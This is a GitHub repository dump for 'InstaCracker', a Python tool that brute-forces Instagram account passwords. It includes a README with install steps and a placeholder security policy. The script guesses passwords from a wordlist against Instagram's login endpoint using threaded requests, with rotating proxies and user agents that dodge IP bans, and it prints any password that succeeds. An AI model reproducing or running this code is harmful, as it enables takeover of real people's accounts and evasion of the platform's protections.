├── requirements.txt ├── README.md ├── SECURITY.md └── InstaCracker.py /requirements.txt: -------------------------------------------------------------------------------- 1 | argparse 2 | logging 3 | random 4 | socket 5 | sys 6 | threading 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # instagram brute forcer 2 | ##A basic and easy tool to brute force Instagram accounts 3 | --- 4 | ## This is a proof of concept and could be improved on in a lot of ways. 5 | 6 | **1º - Download framework from github**
7 | `git clone https://github.com/httpsMrFeri/instagram-brute-forcer`
8 | **3º - Download python**
9 | you can install python from [here](https://www.python.org/downloads/)
10 | **3º - Set execution permissions (you should install python3)**
11 | `cd instagram-brute-forcer`
12 | `pip install -r ./requirements.txt`
13 | `python3 ./InstaCracker.py`
14 | --- 15 | ### share with your friends:heart::fire: 16 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Security Policy 2 | 3 | ## Supported Versions 4 | 5 | Use this section to tell people about which versions of your project are 6 | currently being supported with security updates. 7 | 8 | | Version | Supported | 9 | | ------- | ------------------ | 10 | | 5.1.x | :white_check_mark: | 11 | | 5.0.x | :x: | 12 | | 4.0.x | :white_check_mark: | 13 | | < 4.0 | :x: | 14 | 15 | ## Reporting a Vulnerability 16 | 17 | Use this section to tell people how to report a vulnerability. 18 | 19 | Tell them where to go, how often they can expect to get an update on a 20 | reported vulnerability, what to expect if the vulnerability is accepted or 21 | declined, etc. 22 | -------------------------------------------------------------------------------- /InstaCracker.py: -------------------------------------------------------------------------------- 1 | 2 | ############################################################################### 3 | # Instagram Brute Forcer 4 | # Developed By @o0mrfer0o 5 | ############################################################################### 6 | from __future__ import print_function 7 | 8 | import argparse 9 | import logging 10 | import random 11 | import socket 12 | import sys 13 | import threading 14 | 15 | try: 16 | import urllib.request as rq 17 | from urllib.error import HTTPError 18 | import urllib.parse as http_parser 19 | except ImportError: 20 | import urllib2 as rq 21 | from urllib2 import HTTPError 22 | import urllib as http_parser 23 | 24 | try: 25 | import Queue 26 | except ImportError: 27 | import queue as Queue 28 | 29 | 30 | class bcolors: 31 | HEADER = '\033[94m' 32 | OKGREEN = '\033[92m' 33 | WARNING = '\033[93m' 34 | FAIL = '\033[91m' 35 | ENDC = '\033[0m' 36 | BOLD = '\033[1m' 37 | UNDERLINE = '\033[4m' 38 | 39 | 40 | def check_proxy(q): 41 | """ 42 | check proxy for and append to working proxies 43 | :param q: 44 | """ 45 | if not q.empty(): 46 | 47 | proxy = q.get(False) 48 | proxy = proxy.replace("\r", "").replace("\n", "") 49 | 50 | try: 51 | opener = rq.build_opener( 52 | rq.ProxyHandler({'https': 'https://' + proxy}), 53 | rq.HTTPHandler(), 54 | rq.HTTPSHandler() 55 | ) 56 | 57 | opener.addheaders = [('User-agent', 'Mozilla/5.0')] 58 | rq.install_opener(opener) 59 | 60 | req = rq.Request('https://api.ipify.org/') 61 | 62 | if rq.urlopen(req).read().decode() == proxy.partition(':')[0]: 63 | proxys_working_list.update({proxy: proxy}) 64 | if _verbose: 65 | print(bcolors.OKGREEN + " --[+] ", proxy, " | PASS" + bcolors.ENDC) 66 | else: 67 | if _verbose: 68 | print(" --[!] ", proxy, " | FAILED") 69 | 70 | except Exception as err: 71 | if _verbose: 72 | print(" --[!] ", proxy, " | FAILED") 73 | if _debug: 74 | logger.error(err) 75 | pass 76 | 77 | 78 | def get_csrf(): 79 | """ 80 | get CSRF token from login page to use in POST requests 81 | """ 82 | global csrf_token 83 | 84 | print(bcolors.WARNING + "[+] Getting CSRF Token: " + bcolors.ENDC) 85 | 86 | try: 87 | opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler()) 88 | opener.addheaders = [('User-agent', 'Mozilla/5.0')] 89 | rq.install_opener(opener) 90 | 91 | request = rq.Request('https://www.instagram.com/') 92 | try: 93 | # python 2 94 | headers = rq.urlopen(request).info().headers 95 | except Exception: 96 | # python 3 97 | headers = rq.urlopen(request).info().get_all('Set-Cookie') 98 | 99 | for header in headers: 100 | if header.find('csrftoken') != -1: 101 | csrf_token = header.partition(';')[0].partition('=')[2] 102 | print(bcolors.OKGREEN + "[+] CSRF Token :", csrf_token, "\n" + bcolors.ENDC) 103 | except Exception as err: 104 | print(bcolors.FAIL + "[!] Can't get CSRF token , please use -d for debug" + bcolors.ENDC) 105 | 106 | if _debug: 107 | logger.error(err) 108 | 109 | print(bcolors.FAIL + "[!] Exiting..." + bcolors.ENDC) 110 | exit(3) 111 | 112 | 113 | def brute(q): 114 | """ 115 | main worker function 116 | :param word: 117 | :param event: 118 | :return: 119 | """ 120 | if not q.empty(): 121 | try: 122 | proxy = None 123 | if len(proxys_working_list) != 0: 124 | proxy = random.choice(list(proxys_working_list.keys())) 125 | 126 | word = q.get() 127 | word = word.replace("\r", "").replace("\n", "") 128 | 129 | post_data = { 130 | 'username': USER, 131 | 'password': word, 132 | } 133 | 134 | header = { 135 | "User-Agent": random.choice(user_agents), 136 | 'X-Instagram-AJAX': '1', 137 | "X-CSRFToken": csrf_token, 138 | "X-Requested-With": "XMLHttpRequest", 139 | "Referer": "https://www.instagram.com/", 140 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 141 | 'Cookie': 'csrftoken=' + csrf_token 142 | } 143 | 144 | if proxy: 145 | if _verbose: 146 | print(bcolors.BOLD + "[*] Trying %s %s " % (word, " | " + proxy,) + bcolors.ENDC) 147 | 148 | opener = rq.build_opener( 149 | rq.ProxyHandler({'https': 'https://' + proxy}), 150 | rq.HTTPHandler(), 151 | rq.HTTPSHandler() 152 | ) 153 | 154 | else: 155 | if _verbose: 156 | print(bcolors.BOLD + "[*] Trying %s" % (word,) + bcolors.ENDC) 157 | 158 | opener = rq.build_opener( 159 | rq.HTTPHandler(), 160 | rq.HTTPSHandler() 161 | ) 162 | 163 | rq.install_opener(opener) 164 | 165 | req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header) 166 | sock = rq.urlopen(req) 167 | 168 | if sock.read().decode().find('"authenticated": true') != -1: 169 | print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login:") 170 | print("---------------------------------------------------") 171 | print("[!]Username: ", USER) 172 | print("[!]Password: ", word) 173 | print("---------------------------------------------------\n" + bcolors.ENDC) 174 | found_flag = True 175 | q.queue.clear() 176 | q.task_done() 177 | 178 | except HTTPError as e: 179 | if e.getcode() == 400 or e.getcode() == 403: 180 | if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1: 181 | print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login " 182 | + bcolors.FAIL + "But need Checkpoint :|" + bcolors.OKGREEN) 183 | print("---------------------------------------------------") 184 | print("[!]Username: ", USER) 185 | print("[!]Password: ", word) 186 | print("---------------------------------------------------\n" + bcolors.ENDC) 187 | found_flag = True 188 | q.queue.clear() 189 | q.task_done() 190 | return 191 | elif proxy: 192 | print(bcolors.WARNING + 193 | "[!]Error: Proxy IP %s is now on Instagram jail , Removing from working list !" % (proxy,) 194 | + bcolors.ENDC 195 | ) 196 | if proxy in proxys_working_list: 197 | proxys_working_list.pop(proxy) 198 | print(bcolors.OKGREEN + "[+] Online Proxy: ", str(len(proxys_working_list)) + bcolors.ENDC) 199 | else: 200 | print(bcolors.FAIL + "[!]Error : Your Ip is now on Instagram jail ," 201 | " script will not work fine until you change your ip or use proxy" + bcolors.ENDC) 202 | else: 203 | print("Error:", e.getcode()) 204 | 205 | q.task_done() 206 | return 207 | 208 | except Exception as err: 209 | if _debug: 210 | print(bcolors.FAIL + "[!] Unknown Error in request." + bcolors.ENDC) 211 | logger.error(err) 212 | else: 213 | print(bcolors.FAIL + "[!] Unknown Error in request, please turn on debug mode with -d" + bcolors.ENDC) 214 | 215 | pass 216 | return 217 | 218 | 219 | def starter(): 220 | """ 221 | threading workers initialize 222 | """ 223 | global found_flag 224 | 225 | queue = Queue.Queue() 226 | threads = [] 227 | max_thread = THREAD 228 | found_flag = False 229 | 230 | queuelock = threading.Lock() 231 | 232 | print(bcolors.HEADER + "\n[!] Initializing Workers") 233 | print("[!] Start Cracking ... \n" + bcolors.ENDC) 234 | 235 | try: 236 | for word in words: 237 | queue.put(word) 238 | while not queue.empty(): 239 | queuelock.acquire() 240 | for workers in range(max_thread): 241 | t = threading.Thread(target=brute, args=(queue,)) 242 | t.setDaemon(True) 243 | t.start() 244 | threads.append(t) 245 | for t in threads: 246 | t.join() 247 | queuelock.release() 248 | if found_flag: 249 | break 250 | print(bcolors.OKGREEN + "\n--------------------") 251 | print("[!] Brute complete !" + bcolors.ENDC) 252 | 253 | except Exception as err: 254 | print(err) 255 | 256 | 257 | def check_avalaible_proxys(proxys): 258 | """ 259 | check avalaible proxyies from proxy_list file 260 | """ 261 | socket.setdefaulttimeout(30) 262 | 263 | global proxys_working_list 264 | print(bcolors.WARNING + "[-] Testing Proxy List...\n" + bcolors.ENDC) 265 | 266 | proxys_working_list = {} 267 | max_thread = THREAD 268 | 269 | queue = Queue.Queue() 270 | queuelock = threading.Lock() 271 | threads = [] 272 | 273 | for proxy in proxys: 274 | queue.put(proxy) 275 | 276 | while not queue.empty(): 277 | queuelock.acquire() 278 | for workers in range(max_thread): 279 | t = threading.Thread(target=check_proxy, args=(queue,)) 280 | t.setDaemon(True) 281 | t.start() 282 | threads.append(t) 283 | for t in threads: 284 | t.join() 285 | queuelock.release() 286 | 287 | print(bcolors.OKGREEN + "[+] Online Proxy: " + bcolors.BOLD + str(len(proxys_working_list)) + bcolors.ENDC + "\n") 288 | 289 | 290 | if __name__ == "__main__": 291 | 292 | parser = argparse.ArgumentParser( 293 | description="Instagram BruteForcer", 294 | epilog="./instabrute -u user_test -w words.txt -p proxys.txt -t 4 -d -v" 295 | ) 296 | 297 | # required argument 298 | parser.add_argument('-u', '--username', action="store", required=True, 299 | help='Target Username') 300 | parser.add_argument('-w', '--word', action="store", required=True, 301 | help='Words list path') 302 | parser.add_argument('-p', '--proxy', action="store", required=True, 303 | help='Proxy list path') 304 | # optional arguments 305 | parser.add_argument('-t', '--thread', help='Thread', type=int, default=4) 306 | parser.add_argument('-v', '--verbose', action='store_const', help='Thread', const=True, default=False) 307 | parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False) 308 | 309 | args = parser.parse_args() 310 | 311 | URL = "https://www.instagram.com/accounts/login/ajax/" 312 | USER = args.username 313 | THREAD = args.thread 314 | _verbose = args.verbose 315 | _debug = args.debug 316 | 317 | user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)", 318 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)", 319 | "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1", 320 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)", 321 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201", 322 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 323 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"] 324 | 325 | try: 326 | words = open(args.word).readlines() 327 | except IOError: 328 | print("[-] Error: Check your word list file path\n") 329 | sys.exit(1) 330 | 331 | try: 332 | proxys = open(args.proxy).readlines() 333 | except IOError: 334 | print("[-] Error: Check your proxy list file path\n") 335 | sys.exit(1) 336 | 337 | # enable debugging if its set 338 | if _debug: 339 | # Logging stuff 340 | logging.basicConfig(level=logging.DEBUG, filename="log", 341 | format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') 342 | logger = logging.getLogger(__name__) 343 | 344 | print(bcolors.HEADER + """.-------------------------------------------------------.""") 345 | print("""| |\___/| ___ _ |""") 346 | print("""| ) ( |_ _|_ __ ___| |_ __ _ |""") 347 | print("""|=\ /= | || '_ \/ __| __/ _` | |""") 348 | print("""| )===( | || | | \__ \ || (_| | |""") 349 | print("""| / \ |___|_| |_|___/\__\__,_| |""") 350 | print("""| | | |""") 351 | print("""|/ \ _ ____ _ _ _____ _____ |""") 352 | print("""|\ / | |__ | _ \| | | |_ _| ____| |""") 353 | print("""| \__ _/ | '_ \| |_) | | | | | | | _| |""") 354 | print("""| ( ( | |_) | _ <| |_| | | | | |___ |""") 355 | print("""| ) ) |_.__/|_| \_\_____/ |_| |_____| |""") 356 | print("""| (_( |""") 357 | print("""'-------------------------------------------------------'""") 358 | 359 | print(bcolors.OKGREEN + "[+] Username Loaded:", bcolors.BOLD + USER + bcolors.ENDC) 360 | print(bcolors.OKGREEN + "[+] Words Loaded:", bcolors.BOLD + str(len(words)) + bcolors.ENDC) 361 | print(bcolors.OKGREEN + "[+] Proxy Loaded:", bcolors.BOLD + str(len(proxys)) + bcolors.ENDC) 362 | print(bcolors.ENDC) 363 | 364 | check_avalaible_proxys(proxys) 365 | get_csrf() 366 | starter() --------------------------------------------------------------------------------